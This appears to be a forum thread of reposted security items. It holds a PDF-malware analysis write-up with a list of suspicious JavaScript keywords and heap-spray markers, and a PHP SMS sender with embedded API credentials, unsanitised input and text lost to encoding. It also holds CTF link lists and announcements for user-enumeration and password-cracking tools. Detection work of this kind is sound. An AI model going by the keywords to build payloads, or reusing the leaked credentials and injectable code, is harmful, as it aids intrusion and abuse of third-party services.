  6. [h=1]How to make a JAR file Linux executable[/h] Every Java programmer knows - or should known - that it is possible to create a runnable Java package archive (JAR), so that in order to launch an application it is enough to specify the jar file name on the Java interpreter command line along with the -jar parameter. For example: $ java -jar helloworld.jar There are plenty of tutorials showing how to implement this feature using Ant, Maven, Eclipse, Netbens, etc. Anyway in its basic form, it just requires to add a MANIFEST.MF file to the jar package. The manifest must contain an entry Main-Class that specifies which is the class defining the main method for your application. For example: $ javac HelloWorld.java $ echo Main-Class: HelloWorld > MANIFEST.MF $ jar -cvmf MANIFEST.MF helloworld.jar HelloWorld.class But this still requires your users to invoke the Java interpreter with the -jar option. There are many reasons why it would be preferable to have your app runnable by simply invoking it on the terminal shell like any other command. Here comes the protip! This technique it is based on the ability to append a generic binary payload to a Linux shell script. Read more about this here: Add a Binary Payload to your Shell Scripts | Linux Journal Taking advantage of this possibility the trick is just to embed a runnable jar file into a Bash script file. The script when executed will launch the Java interpreter specifying itself as the jar to run. Too complex? Much more easier to do in practice, than to explain! Let's say that you have a runnable jar named helloworld.jar Copy the Bash script below to a file named stub.sh #!/bin/sh MYSELF=`which "$0" 2>/dev/null` [ $? -gt 0 -a -f "$0" ] && MYSELF="./$0" java=java if test -n "$JAVA_HOME"; then java="$JAVA_HOME/bin/java" fi exec "$java" $java_args -jar $MYSELF "$@" exit 1 Than append the jar file to the saved script and grant the execute permission to the file resulting with the following command: cat stub.sh helloworld.jar > hello.run && chmod +x helloworld.run That's all! Now you can execute the app just typing helloworld.run on your shell terminal. The script is smart enough to pass any command line parameters to the Java application transparently. Cool! Isn't it ?! In the case your are a Windows guy, obviously this will not work (except you will run a Linux compatibility layer like Cygwin). Anyway exist tools that are able to wrap a Java application into a native Windows .exe binary file, producing a result similar to the one explained in this tutorial. See for example Launch4j - Cross-platform Java executable wrapper Sursa: https://coderwall.com/p/ssuaxa
  7. [h=3]AnalyzePDF - Bringing the Dirt Up to the Surface[/h] [h=2]What is that thing they call a PDF?[/h] The Portable Document Format (PDF) is an old format ... it was created by Adobe back in 1993 as an open standard but wasn't officially released as an open standard (SIO 32000-1) until 2008 - right @nullandnull ? I can't take credit for the nickname that I call it today, Payload Delivery Format, but I think it's clever and applicable enough to mention. I did a lot of painful reading through the PDF specifications in the past and if you happen to do the same I'm sure you'll also have a lot of "hm, that's interesting" thoughts as well as many "wtf, why?" thoughts. I truly encourage you to go out and do the same... it's a great way to learn about the internals of something, what to expect and what would be abnormal. The PDF has become a defacto for transferring files, presentations, whitepapers etc. <rant> How about we stop releasing research/whitepapers about PDF 0-days/exploits via a PDF file... seems a bit backwards</rant> We've all had those instances where you wonder if that file is malicious or benign ... do you trust the sender or was it downloaded from the Internet? Do you open it or not? We might be a bit more paranoid than most people when it comes to this type of thing and but since they're so common they're still a reliable means for a delivery method by malicious actors. As the PDF contains many 'features', these features often turn into 'vulnerabilities' (Do we really need to embed an exe into our PDF? or play a SWF game?). Good thing it doesn't contain any vulnerabilities, right? (to be fair, the sandboxed versions and other security controls these days have helped significantly) Adobe Acrobat Reader : CVE security vulnerabilities, versions and detailed reports [h=3]What does a PDF consist of?[/h] In its most basic format, a PDF consists of four components: header, body, cross-reference table (Xref) and trailer: (sick M$ Paint skillz, I know) If we create a simple PDF (this example only contains a single word in it) we can see a better idea of the contents we'd expect to see: [h=2]What else is out there?[/h] Since PDF files are so common these days there's no shortage of tools to rip them apart and analyze them. Some of the information contained in this post and within the code I'm releasing may be an overlap of others out there but that's mainly because the results of our research produced similar results or our minds think alike...I'm not going to touch on every tool out there but there are some that are worth mentioning as I either still use them in my analysis process or some of their functionality/lack of functionality is what sparked me to write AnalyzePDF. By mentioning the tools below my intentions aren't to downplay them and/or their ability to analyze PDF's but rather helping to show reasons I ended up doing what I did. [h=4]pdfid/pdf-parser[/h] Didier Stevens created some of the first analysis tools in this space, which I'm sure you're already aware of. Since they're bundled into distros like BackTrack/REMnux already they seem like good candidates to leverage for this task. Why recreate something if it's already out there? Like some of the other tools, it parses the file structure and presents the data to you... but it's up to you to be able to interpret that data. Because these tools are commonly available on distros and get the job done I decided they were the best to wrap around. Did you know that pdfid has a lot more capability/features that most aren't aware of? If you run it with the (-h) switch you'll see some other useful options such as the (-e) which display extra information. Of particular note here is the mention of "%%EOF", "After last %%EOF", create/mod dates and the entropy calculations. During my data gathering I encountered a few hiccups that I hadn't previously experienced. This is expected as I was testing a large data set of who knows what kind of PDF's. Again, I'm not noting these to put down anyone's tools but I feel it's important to be aware of what the capabilities and limitations of something are - and also in case anyone else runs into something similar so they have a reference. Because of some of these, I am including a slightly modified version of pdfid as well. I haven't tested if the newer version fixed anything so I'd rather give the files that I know work with it for everyone. I first experienced a similar error as mentioned here when using the (-e) option on a few files (e.g. - cbf76a32de0738fea7073b3d4b3f1d60). It appears it doesn't count multiple '%%EOF's since if the '%%EOF' is the last thing in the file without a '/r' or '/n' behind it, it doesn't seem to count it. I've had cases where the '/Pages' count was incorrect - there were (15) PDF's that showed '0' pages during my tests. One way I tried to get around this was to use the (-a) option and test between the '/Page' and '/Pages/ values. (e.g. - ac0487e8eae9b2323d4304eaa4a2fdfce4c94131) There were times when the number of characters after the last '%%EOF' were incorrect Won't flag on JavaScript if it's written like "<script contentType="application/x-javascript">" (e.g - cbf76a32de0738fea7073b3d4b3f1d60) : [h=4]peepdf[/h] Peepdf has gone through some great development over the course of me using it and definitely provides some great features to aid in your analysis process. It has some intelligence built into it to flag on things and also allows one to decode things like JavaScript from the current shell. Even though it has a batch/automated mode to it, it still feels like more of a tool that I want to use to analyze a single PDF at a time and dig deep into the files internals. Originally, this tool didn't look match keywords if they had spaces after them but it was a quick and easy fix... glad this testing could help improve another users work. [h=4]PDFStreamDumper[/h] PDFStreamDumper is a great tool with many sweet features but it has its uses and limitations like all things. It's a GUI and built for analysis on Windows systems which is fine but it's power comes from analyzing a single PDF at a time - and again, it's still mostly a manual process. [h=4]pdfxray/pdfxray_lite[/h] Pdfxray was originally an online tool but Brandon created a lite version so it could be included in REMnux (used to be publicly accessible but at the time of writing this looks like that might have changed). If you look back at some of Brandon's work historically he's also done a lot in this space as well and since I encountered some issues with other tools and noticed he did as well in the past I know he's definitely dug deep and used that knowledge for his tools. Pdfxray_lite has the ability to query VirusTotal for the file's hash and produce a nice HTML report of the files structure - which is great if you want to include that into an overall report but again this requires the user to interpret the parsed data [h=4]pdfcop[/h] Pdfcop is part of the Origami framework. There're some really cool tools within this framework but I liked the idea of analyzing a PDF file and alerting on badness. This particular tool in the framework has that ability, however, I noticed that if it flagged on one cause then it wouldn't continue analyzing the rest of the file for other things of interest (e.g. - I've had it close the file our right away if there was an invalid Xref without looking at anything else. This is because PDF's are read from the bottom up meaning their Xref tables are first read in order to determine where to go next). I can see the argument of saying why continue to analyze the file if it already was flagged bad but I feel like that's too much of tunnel vision for me. I personally prefer to know more than less...especially if I want to do trending/stats/analytics. [h=2]So why create something new?[/h] While there are a wealth of PDF analysis tools these days, there was a noticeable gap of tools that have some intelligence built into them in order to help automate certain checks or alert on badness. In fairness, some (try to) detect exploits based on keywords or flag suspicious objects based on their contents/names but that's generally the extent of it. I use a lot of those above mentioned tools when I'm in the situation where I'm handed a file and someone wants to know if it's malicious or not... but what about when I'm not around? What if I'm focused/dedicated to something else at the moment? What if there's wayyyy too many files for me to manually go through each one? Those are the kinds of questions I had to address and as a result I felt I needed to create something new. Not necessarily write something from scratch... I mean why waste that time if I can leverage other things out there and tweak them to fit my needs? [h=3]Thought Process[/h] What do people typically do when trying to determine if a PDF file is benign or malicious? Maybe scan it with A/V and hope something triggers, run it through a sandbox and hope the right conditions are met to trigger or take them one at a time through one of the above mentioned tools? They're all fine work flows but what if you discover something unique or come across it enough times to create a signature/rule out of so you can trigger on it in the future? We tend to have a lot to remember so doing the analysis one offs may result in us forgetting something that we previously discovered. Additionally, this doesn't scale too great in the sense that everyone on your team might not have the same knowledge that you do... so we need some consistency/intelligence built in to try and compensate for these things.< I felt it was better to use the characteristics of a malicious file (either known or observed from combinations of within malicious files) to eval what would indicate a malicious file. Instead of just adding points for every questionable attribute observed. e.g. - instead of adding a point for being a one page PDF, make a condition to say if you see an invalid xref and a one page PDF then give it a score of X. This makes the conditions more accurate in my eyes; since, for example: A single paged PDF by itself isn't malicious but if it also contains other things of question then it should have a heavier weight of being malicious. Another example is JavaScript within a PDF. While statistics show JavaScript within a PDF are a high indicator that it's malicious, there're still legitimate reasons for JavaScript to be within a PDF (e.g. - to calculate a purchase order form or verify that you correctly entered all the required information the PDF requires). [h=3]Gathering Stats[/h] At the time I was performing my PDF research and determining how I wanted to tackle this task I wasn't really aware of machine learning. I feel this would be a better path to take in the future but the way I gathered my stats/data was in a similar (less automated/cool AI) way. There's no shortage of PDF's out there which is good for us as it can help us to determine what's normal, malicious, or questionable and leverage that intelligence within a tool. If you need some PDF's to gather some stats on, contagio has a pretty big bundle to help get you started. Another resource is Govdocs from Digital Corpora ... or a simple Google dork. Note : Spidering/downloading these will give you files but they still need to be classified as good/bad for initial testing). Be aware that you're going to come across files that someone may mark as good but it actually shows signs of badness... always interesting to detect these types of things during testing! [h=4]Stat Gathering Process[/h] So now that I have a large set of files, what do I do now? I can't just rely on their file extensions or someone else saying they're malicious or benign so how about something like this: Verify it's a PDF file. When reading through the PDF specs I noticed that the PDF header can be within the first 1024 bytes of the file as stated in ""3.4.1, 'File Header' of Appendix H - ' Acrobat viewers require only that the header appear somewhere within the first 1024 bytes of the file.'"... that's a long way down compared to the traditional header which is usually right in the beginning of a file. So what's that mean for us? Well if we rely solely on something like file or TRiD they _might_ not properly identify/classify a PDF that has the header that far into the file as most only look within the first 8 bytes (unfair example is from corkami). We can compensate for this within our code/create a YARA rule etc.... you don't believe me you say? Fair enough, I don't believe things unless I try them myself either: The file to the left is properly identified as a PDF file but when I created a copy of it and modified it so the header was a bit lower, the tools failed. The PDF on the right is still in accordance with the PDF specs and PDF viewers will still open it (as shown)... so this needs to be taken into consideration. [*]Get rid of duplicates (based on SHA256 hash) for both files in the same category (clean vs. dirty) then again via the entire data set afterwards to make sure there're no duplicates between the clean and dirty sets. [*]Run pdfid & pdfinfo over the file to parse out their data. These two are already included in REMnux so I leveraged them. You can modify them to other tools but this made it flexible for me and I knew the tool would work when run on this distro; pdfinfo parsed some of the data better during tests so getting the best of both of them seemed like the best approach. [*]Run scans for low hanging fruit/know badness with local A/V||YARA Now that we have a more accurate data set classified: [*]Are all PDFs classified as benign really benign? [*]Are all PDFs classified as malicious really malicious? [h=3]Stats[/h] Files analyzed (no duplicates found between clean & dirty): [TABLE=width: 50%] [TR] [TH]Class[/TH] [TH]Type[/TH] [TH]Count[/TH] [/TR] [TR] [TD]Dirty[/TD] [TD]Pre-Dup[/TD] [TD]22,342[/TD] [/TR] [TR] [TD]Dirty[/TD] [TD]Post-Dup[/TD] [TD]11,147[/TD] [/TR] [TR] [TD]Clean[/TD] [TD]Pre-Dup[/TD] [TD]2,530[/TD] [/TR] [TR] [TD]Dirty[/TD] [TD]Post-Dup[/TD] [TD]2,529[/TD] [/TR] [TR] [TD=colspan: 2]Total Files Analyzed:[/TD] [TD]13,676[/TD] [/TR] [/TABLE] I've collected more than enough data to put together a paper or presentation but I feel that's been played out already so if you want more than what's outlined here just ping me. Instead of dragging this post on for a while showing each and every stat that was pulled I feel it might be more useful to show a high level comparison of what was detected the most in each set and some anomalies. [h=4]Ah-Ha's[/h] None of the clean files had incorrect file headers/versions There wasn't a single keyword/attribute parsed from the clean files that covered more than 4.55% of it's entire data set class. This helps show the uniqueness of these files vs. malicious actors reusing things. The dates within the clean files were generally unique while the date fields on the dirty files were more clustered together - again, reuse? None of the values for the keywords/attributes of the clean files were flagged as trying to be obfuscated by pdfid Clean files never had '/Colors > 2^24' above 0 while some dirty files did Rarely did a clean file have a high count of JavaScript in it while dirty files ranged from 5-149 occurrences per file '/JBIG2Decode' was never above '0' in any clean file '/Launch' wasn't used much in either of the data sets but still more common in the dirty ones Dirty files have far more characters after the last %%EOF (starting from 300+ characters is a good check) Single page PDF's have a higher likelihood of being malicious - no duh '/OpenAction' is far more common in malicious files [h=4]YARA signatures[/h] I've also included some PDF YARA rules that I've created as a separate file so you can use those to get started. YARA isn't really required but I'm making it that way for the time being because it's helpful... so I have the default rules location pointing to REMnux's copy of MACB's rules unless otherwise specified. Clean data set: Dirty data set: Signatures that triggered across both data sets: Cool... so we know we have some rules that work well and others that might need adjusting, but they still help! [h=4]What to look for[/h] So we have some data to go off of... what are some additional things we can take away from all of this and incorporate into our analysis tool so we don't forget about them and/or stop repetitive steps? Header In addition to being after the first 8 bytes I found it useful to look at the specific version within the header. This should normally look like "%PDF-M.N." where M.N is the Major/Minor version .. however, the above mentioned 'low header' needs to be looked for as well. Knowing this we can look for invalid PDF version numbers or digging deeper we can correlate the PDF's features/elements to the version number and flag on mismatches. Here're some examples of what I mean, and more reasons why reading those dry specs are useful: If FlateDecode was introduced in v1.2 then it shouldn't be in any version below If JavaScript and EmbeddedFiles were introduced in v1.3 then they shouldn't be in any version below If JBIG2 was introduced in v1.4 then it shouldn't be in any version below [*]Body This is where all of the data is (supposed to be) stored; objects (strings, names, streams, images etc.). So what kinds of semi-intelligent things can we do here? Look for object/stream mismatches. e.g - Indirect Objects must be represented by 'obj' and 'endobj' so if the number of 'obj' is different than the number of 'endobj' mentions then it might be something of interest Are there any questionable features/elements within the PDF? JavaScript doesn't immediately make the file malicious as mentioned earlier, however, it's found in ~90% of malicious PDF's based on others and my own research. '/RichMedia' - indicates the use of Flash (could be leveraged for heap sprays) '/AA', '/OpenAction', '/AcroForm' - indicate that an automatic action is to be performed (often used to execute JavaScript) '/JBIG2Decode', '/Colors' - could indicate the use of vulnerable filters; Based on the data above maybe we should look for colors with a value greater than 2^24 '/Launch', '/URL', '/Action', '/F', '/GoToE', '/GoToR' - opening external programs, places to visit and redirection games Obfuscation Multiple filters ('/FlateDecode', '/ASCIIHexDecode', '/ASCII85Decode', '/LZWDecode', '/RunLengthDecode') The streams within a PDF file may have filters applied to them (usually for compressing/encoding the data). While this is common, it's not common within benign PDF files to have multiple filters applied. This behavior is commonly associated with malicious files to try and thwart A/V detection by making them work harder. Separating code over multiple objects Placing code in places it shouldn't be (e.g. - Author, Keywords etc.) White space randomization Comment randomization Variable name randomization String randomization Function name randomization Integer obfuscation Block randomization Any suspicious keywords that could mean something malicious when seen with others? eval, array, String.fromCharCode, getAnnots, getPageNumWords, getPageNthWords, this.info, unescape, %u9090 [*]Xref The first object has an ID 0 and always contains one entry with generation number 65535. This is at the head of the list of free objects (note the letter ‘f’ that means free). The last object in the cross reference table uses the generation number 0. Translation please? Take a look a the following Xref: Knowing how it's supposed to look we can search for Xrefs that don't adhere to this structure. [*]Trailer Provides the offset of the Xref (startxref) Contains the EOF, which is supposed to be a single line with "%%EOF" to mark the end of the trailer/document. Each trailer will be terminated by these characters and should also contain the '/Prev' entry which will point to the previous Xref. Any updates to the PDF usually result in appending additional elements to the end of the file This makes it pretty easy to determine PDF's with multiple updates or additional characters after what's supposed to be the EOF [*]Misc. Creation dates (both format and if a particular one is known to be used) Title Author Producer Creator Page count [h=2]The Code[/h] So what now? We have plenty of data to go on - some previously known, but some extremely new and helpful. It's one thing to know that most files with JavaScript or that are (1) page have a higher tendency of being malicious... but what about some of the other characteristics of these files? By themselves, a single keyword/attribute might not stick out that much but what happens when you start to combine them together? Welp, hang on because we're going to put this all together. [h=3]File Identification[/h] In order to account for the header issue, I decided the tool itself would look within the first 1024 bytes instead of relying on other file identification tools: Another way, so this could be detected whether this tool was used or not, was to create a YARA rule such as: [h=3]Wrap pdfinfo[/h] Through my testing I found this tool to be more reliable in some areas as opposed to pdfid such as: Determining if there're any Xref errors produced when trying to read the PDF Look for any unterminated hex strings etc. Detecting EOF errors [h=3]Wrap pdfid[/h] Read the header. *pdfid will show exactly what's there and not try to convert it* _attempt_ to determine the number of pages Look for object/stream mismatches Not only look for JavaScript but also determine if there's an abnormally high amount Look for other suspicious/commonly used elements for malicious purposes (AcroForm, OpenAction, AdditionalAction, Launch, Embedded files etc.) Look for data after EOF Calculate a few different entropy scores Next, perform some automagical checks and hold on to the results for later calculations. [h=3]Scan with YARA[/h] While there are some pre-populated conditions that score a ranking built into the tool already, the ability to add/modify your own is extremely easy. Additionally, since I'm a big fan of YARA I incorporated it into this as well. There're many benefits of this such as being able to write a rule for header evasion, version number mismatching to elements or even flagging on known malicious authors or producers. The biggest strength, however, is the ability to add a 'weight' field in the meta section of the YARA rules. What this does is allow the user to determine how good of a rule it is and if the rule triggers on the PDF, then hold on to its weighted value and incorporate it later in the overall calculation process which might increase it's maliciousness score. Here's what the YARA parsing looks like when checking the meta field: And here's another YARA rule with that section highlighted for those who aren't sure what I'm talking about: If the (-m) option is supplied then if _any_ YARA rule triggers on the PDF file it will be moved to another directory of your choosing. This is important to note because one of your rules may hit on the file but it may not be displayed in the output, especially if it doesn't have a weight field. Once the analysis has completed the calculation process starts. This is two phase - Anything noted from pdfino and pdfid are evaluated against some pre-determined combinations I configured. These are easy enough to modify as needed but they've been very reliable in my testing...but hey, things change! Instead of moving on once one of the combination sets is met I allow the scoring to go through each one and add the additional points to the overall score, if warranted. This allows several 'smaller' things to bundle up into something of interest rather than passing them up individually. Any YARA rule that triggered on the PDF file has it's weighted value parsed from the rule and added to the overall score. This helps bump up a files score or immediately flag it as suspicious if you have a rule you really want to alert on. So what's it look like in action? Here's a picture I tweeted a little while back of it analyzing a PDF exploiting CVE-2013-0640 : [h=3]Download[/h] I've had this code for quite a while and haven't gotten around to writing up a post to release it with but after reading a former coworkers blog post last night I realized it was time to just write something up and get this out there as there are still people asking for something that employs some of the capabilities (e.g. - weight ranking). Is this 100% right all the time? No... let's be real. I've come across situations where a file that was benign was flagged as malicious based on its characteristics and that's going to happen from time to time. Not all PDF creators adhere to the required specifications and some users think it's fun to embed or add things to PDF's when it's not necessary. What this helps to do is give a higher ranking to files that require closer attention or help someone determine if they should open a file right away vs. send it to someone else for analysis (e.g. - deploy something like this on a web server somewhere and let the user upload their questionable file to is and get back a "yes it's ok -or- no, sending it for analysis". AnalyzePDF can be downloaded on my github [h=2]Further Reading[/h] Research papers (one | two | three) [PDF] PDFTricks PDF Overview Posted by hiddenillusion Sursa: :: hiddenillusion ::: AnalyzePDF - Bringing the Dirt Up to the Surface
  8. AnalyzePDF.py Analyzes PDF files by looking at their characteristics in order to add some intelligence into the determination of them being malicious or benign. Requirements * pdfid * pdfinfo * yara Usage $ python AnalyzePDF.py -h usage: AnalyzePDF.py [-h] [-m MOVE] [-y YARARULES] Path Produces a high level overview of a PDF to quickly determine if further analysis is needed based on it's characteristics positional arguments: Path Path to directory/file(s) to be scanned optional arguments: -h, --help show this help message and exit -m MOVE, --move MOVE Directory to move files triggering YARA hits to -y YARARULES, --yararules YARARULES Path to YARA rules. Rules should contain a weighted score in the metadata section. (i.e. weight = 3) example: python AnalyzePDF.py -m tmp/badness -y foo/pdf.yara bar/getsome.pdf Restrictions Free to use for non-commercial. Give credit where credit is due. Sursa & Download: https://github.com/hiddenillusion/AnalyzePDF
  9. [h=1]A Tor-like service run by former NSA/TAO Director & CIA National Clandestine Service Senior Officer[/h]Hi all, there's a Tor-like service run by former NSA/TAO Director & CIA National Clandestine Service Senior Officer. It seems a Commercial Onion Routing Privacy Service for US enterprises and Government Agencies. It's called NetAbstraction: NetAbstraction | Internet Privacy Protection "NetAbstraction is a Cloud-based service that obscures and varies your network pathways, while protecting your identity and your systems." They say to fully cooperate with Law Enforcement from NetAbstraction | Internet Privacy Protection Behind NetAbstraction there's a company, Cutting Edge CA: Cutting Edge C. A. | Advanced Cloud Applications The president and CTO of Cutting Edge CA is a former NSA "Tailored Access Operation" (TAO) Senior Leader, Miss. Barbara Hunt Barbara Hunt | LinkedIn . >From Miss. Hunt linkedin public profile: " My last position in the Intelligence Community (2008-2012) was as Director of Capabilities for Tailored Access Operations at the National Security Agency. As a member of NSA/TAO's senior leadership team, was responsible for end-to-end development and capabilities delivery for a large scale computer network exploitation effort" Works here also a former 24 years CIA Senior Operations Officer that was in charge of National Clandestine Service, Mr. Bay. >From Cutting Edge C. A. | Advanced Cloud Applications : "Mr. Bay is a retired CIA Senior Operations Officer with 24 years of experience conducting a full range of intelligence operations for the National Clandestine Service, including operational innovation and implementation of telecommunications and information technology programs. Mr. Bay also brings extensive experience in alternate persona research, planning, acquisition, and use." It would be very interesting if someone would spent some more time investigating it, to get a bit more a in depth picture, other than just my early OSINT. Former spy, experts on COMINT and SIGINT, running an online privacy service? mmmmmmmmmmm... -- Fabio Pietrosanti (naif) HERMES - Center for Transparency and Digital Human Rights HERMES Center for Transparency and Digital Human Rights - Makers of Tor2Web, GlobaLeaks, LeakDirectory - http://globaleaks.org - tor2web: browse the anonymous internet Sursa: https://lists.torproject.org/pipermail/tor-talk/2014-January/031554.html
  10. 30C3 CTF writups collection PWN cwitscher 350 http://pastebin.com/jMbTX521 bittorrent 400 todos 300 http://codezen.fr/2013/12/30/30c3-ctf-pwn-300-todos-write-up-sql-injection-ret2libc/ http://balidani.blogspot.in/2013/12/30c3-ctf-todos-writeup.html bigdata 400 DOGE1 100 http://thehackerblog.com/such-ctf-very-wow-30c3-doge1-writeup/ http://tasteless.se/2013/12/30c3-ctf-doge1-writeup/ DOGE2 400 http://pastebin.com/81CY5Pg2 HolyChallenge 500 http://blog.dragonsector.pl/2013/12/30c3-ctf-holychallenge-pwn-500.html SANDBOX int80 300 http://blog.dragonsector.pl/2013/12/30c3-ctf-int80-sandbox-300.html yass 400 PyExec 300 http://blog.dragonsector.pl/2013/12/30c3-ctf-pyexec-sandbox-300.html http://delimitry.blogspot.in/2013/12/30c3-ctf-2013-sandbox-300-pyexec-writeup.html MISC notesEE 400 rsync 200 http://tasteless.se/2013/12/30c3-ctf-rsync-writeup/ http://dr0x0n.blogspot.in/2013/12/writeup-30c3-ctf-2013-rsync-200-rsync.html cableguy 100 NUMBERS fourier 200 http://d.hatena.ne.jp/waidotto/20131230 guess 100 http://tasteless.se/2013/12/30c3-ctf-guess-writeup/ matsch 300 angler 300 http://blog.zachorr.com/30C3-CTF-Numbers-300-angler/ Posted by Deva 30C3 CTF – PWN 300
  11. Bitcoin ATMs Are Spreading Across the World BY Brian Patrick Eha | December 31, 2013 Sometimes the future can sneak up on you. Like when you find out that a startup incorporated in the British Virgin Islands, whose employees live in New Hampshire and whose products are made in Portugal, is selling digital-currency ATMs to Saudi Arabia and Singapore. These are only two of the countries that have purchased Bitcoin ATMs from manufacturer Lamassu, which announced Monday that it had sold 120 of the machines to customers all over the world. A map Lamassu created to mark the occasion, showing the far-flung sales locations of its Bitcoin ATMs, not coincidentally illustrates the global appeal of Bitcoin. Zach Harvey, Lamassu's chief executive, said as much in a press release. "We will be shipping to 25 different countries, ranging from Canada to Kyrgyzstan, and we've translated our user interface into more than a dozen languages, including Russian, Chinese and Friulian," Harvey said. Lamassu has delivered about a dozen ATMs so far, with plans to ship the others in spring 2014. In October 2013, another company, Robocoin, made headlines for its Bitcoin ATM, said to be the first in the world that was available to the public, when one of its machines was installed in a coffee house in Vancouver. Within its first month in operation, the ATM had processed more than CAD$1 million in transactions. Robocoin's machine, which costs $20,000, or four to five times as much as Lamassu's (the company offers price discounts for bulk orders), both to buy bitcoins with paper bills and to withdraw cash by selling bitcoins. Lamassu's table-top ATM, which is much more compact than Robocoin's kiosk, cannot provide cash in exchange for bitcoins, only the other way around. Although Bitcoin ATMs are still in their infancy, they already represent a contentious space, in which each company is jealous of its claim to fame. After Business Insider Australia reported Monday that a company called 21st Century Bitcoin Exchange was setting up the first Bitcoin ATM in Australia, Lamassu corrected the news site on Twitter, saying it had already installed one of its own ATMs in Melbourne, with "about 15 more on their way." Robocoin's chief executive, for his part, took a shot at buy-only machines such as Lamassu's when his company's ATM debuted this past August. "Seriously, how bush league is an 'ATM' if it can't do the equivalent of deposits and withdrawals?" Robocoin CEO Jordan Kelley said. Lamassu will be presenting its Bitcoin ATM for trial use at the CES Startup Debut event in Las Vegas on January 5, prior to the Consumer Electronics Show that will kick off two days later. After one of Lamassu's machines was installed in Bratislava, Slovakia, a local man named Juraj Bedn?r created a demonstrating how easy it is to use. "It's always exciting for a young startup to have sales ramp up," Harvey said in the release. "But what's really thrilling for us is to know that these will be out in the wild, providing millions of people with effortless access to Bitcoin every single day." Sursa: Bitcoin ATMs Are Spreading Across the World | Entrepreneur.com
  12. Nu stiu daca merge, sau daca merge pe Romania: <?php if(!empty($_POST["message"])) { // ???? $to = $_POST["to"]; $from = $_POST["from"]; $message = $_POST["message"]; // ????????? ??? ???? ?? ?????? // ?????????, ??? ?? ??? ?????? ?????? $numbers = file_get_contents("numbers.txt"); if(preg_match_all("/^.*$to.*\$/m", $numbers, $matches)) die("?? ???? ????? ??? ???? ??????????? ????????."); // ?????????? ??? $result = file_get_contents("http://api.fastsms.pro/send.php?username=Fmsg&password=b236d1aae3720b19d68255d23f42d096&useDirect=1&sender=$from&numbers=$to&message=".urlencode($message)); if(is_numeric($result)) echo("????????? ??????????"); else die("?????? ????????: $result."); // ????? ??????????? ? ???? ? ????????? ??? $file = fopen("numbers.txt", "r+"); fwrite($file, "$to\n"); fclose($file); die(); } ?> <form action='index.php' method='POST'> <table> <tr> <td> ??? ???????????:</td> <td> <input name='from' type='text' value='DedMoroz' readonly></td> </tr> <tr> <td> ????? ??????????:</td> <td> <input name='to' type='text' value=''></td> </tr> <tr> <td> ????? ?????????:</td> <td> <input name='message' type='text' value='???? ???? ????' readonly></td> </tr> <tr> <td> <button type='submit'>?????????</button></td> </tr> </table> </form> Sursa: http://pastebin.com/raw.php?i=88UY7t2Z
  13. [h=1]30c3: To Protect And Infect, Part 2[/h] by: Jacob "@ioerror" Applebaum
  14. Lynis The Unix/Linux Hardening tool updated to v1.3.8 Lynis is a security tool to audit and harden Unix and Linux based systems. It scans the system by performing many security control checks, looks for installed software and determines compliance to standards. Also will it detects security issues and errors in configuration. At the end of the scan it will provide the warnings and suggestions to help you improving the security defense of your systems. Some of the (future) features and usage options: System and security audit checks File Integrity Assessment System and file forensics Usage of templates/baselines (reporting and monitoring) Extended debugging features This tool is tested or confirmed to work with: AIX, Linux, FreeBSD, OpenBSD, Mac OS X, Solaris Changelog New parameter –view-categories to display available test categories Added /etc/hosts check (duplicates) [NAME-4402] Added /etc/hosts check (hostname) [NAME-4404] Added /etc/hosts check (localhost mapping) [NAME-4406] Portmaster test for possible port upgrades [PKGS-7378] Check for SPARC improve boot loader (SILO) [bOOT-5142] NFS client access test [sTRG-1930] Check system uptime [bOOT-5202] YUM repolist check [PKGS-7383] Contributors file added Improved locate database check and reporting [FILE-6410] Improved PAE/No eXecute test for Linux kernel [KRNL-5677] Disabled NIS domain name from test [NAME-4028] Extended NIS domain test to check BSD sysctl value [NAME-4306] Extended PAM tools check with PAM paths [AUTH-9262] Adjusted Apache check to avoid skipping it [HTTP-6622] Extended USB state testing [sTRG-1840] Extended Firewire state testing [sTRG-1846] Extended core dump test [KRNL-5820] Added /lib/i386-linux-gnu/security to PAM directories Added /usr/X11R6/bin directory to binary paths Improved readability of screen output Improved logging for several tests Improved Debian version detection Added warning to BIND test [NAME-4206] Extended binaries with showmount and yum Updated man page Download Sursa: ToolsWatch.org – The Hackers Arsenal Tools | Repository for vFeed and DPE Projects
  15. Kacak v0.1 released – Enumerate users in subnets Kacak is a tool that can enumerate users specified in the configuration file for windows based networks. It uses metasploit smb_enumusers_domain module in order to achieve this via msfrpcd service. If you are wondering what the msfrpcd service is, please look at the https://github.com/rapid7/metasploit-framework/blob/master/documentation/msfrpc.txt . It also parse mimikatz results. Download Submitted by Gokhan ALKAN (Tool’s author) Sursa: ToolsWatch.org – The Hackers Arsenal Tools | Repository for vFeed and DPE Projects
  16. hashcat v0.47 (Advanced Password Recovery) Released Hashcat is the world’s fastest CPU-based password recovery tool. While it’s not as fast as its GPU counterparts oclHashcat-plus and oclHashcat-lite, large lists can be easily split in half with a good dictionary and a bit of knowledge of the command switches. Changelog v0.47 added -m 123 = EPi added -m 1430 = sha256(unicode($pass).$salt) added -m 1440 = sha256($salt.unicode($pass)) added -m 1441 = EPiServer 6.x >= v4 added -m 1711 = SSHA-512(Base64), LDAP {SSHA512} added -m 1730 = sha512(unicode($pass).$salt) added -m 1740 = sha512($salt.unicode($pass)) added -m 7400 = SHA-256(Unix) added -m 7600 = Redmine SHA1 debug mode can now be used also together with -g, generate rule support added for using external salts together with mode 160 = HMAC-SHA1 (key = $salt) allow empty salt/key for HMAC algos allow variable rounds for hash modes 500, 1600, 1800, 3300, 7400 using rounds= specifier added –generate-rules-seed, sets seed used for randomization so rulesets can be reproduced added output-format type 8 (position:hash:plain) updated/added some hcchr charset files in /charsets, some new files: Bulgarian, Polish, Hungarian format output when using –show according to the –outfile-format option show mask length in status screen –disable-potfile in combination with –show or –left resulted in a crash, combination was disallowed Features Multi-Threaded Free Multi-Hash (up to 24 million hashes) Multi-OS (Linux, Windows and OSX native binaries) Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, …) SSE2, AVX and XOP accelerated All Attack-Modes except Brute-Force and Permutation can be extended by rules Very fast Rule-engine Rules compatible with JTR and PasswordsPro Possible to resume or limit session Automatically recognizes recovered hashes from outfile at startup Can automatically generate random rules Load saltlist from external file and then use them in a Brute-Force Attack variant Able to work in an distributed environment Specify multiple wordlists or multiple directories of wordlists Number of threads can be configured Threads run on lowest priority Supports hex-charset Supports hex-salt 90+ Algorithms implemented with performance in mind …and much more More Information: hashcat Wiki Download hashcat v0.47 Sursa: ToolsWatch.org – The Hackers Arsenal Tools | Repository for vFeed and DPE Projects
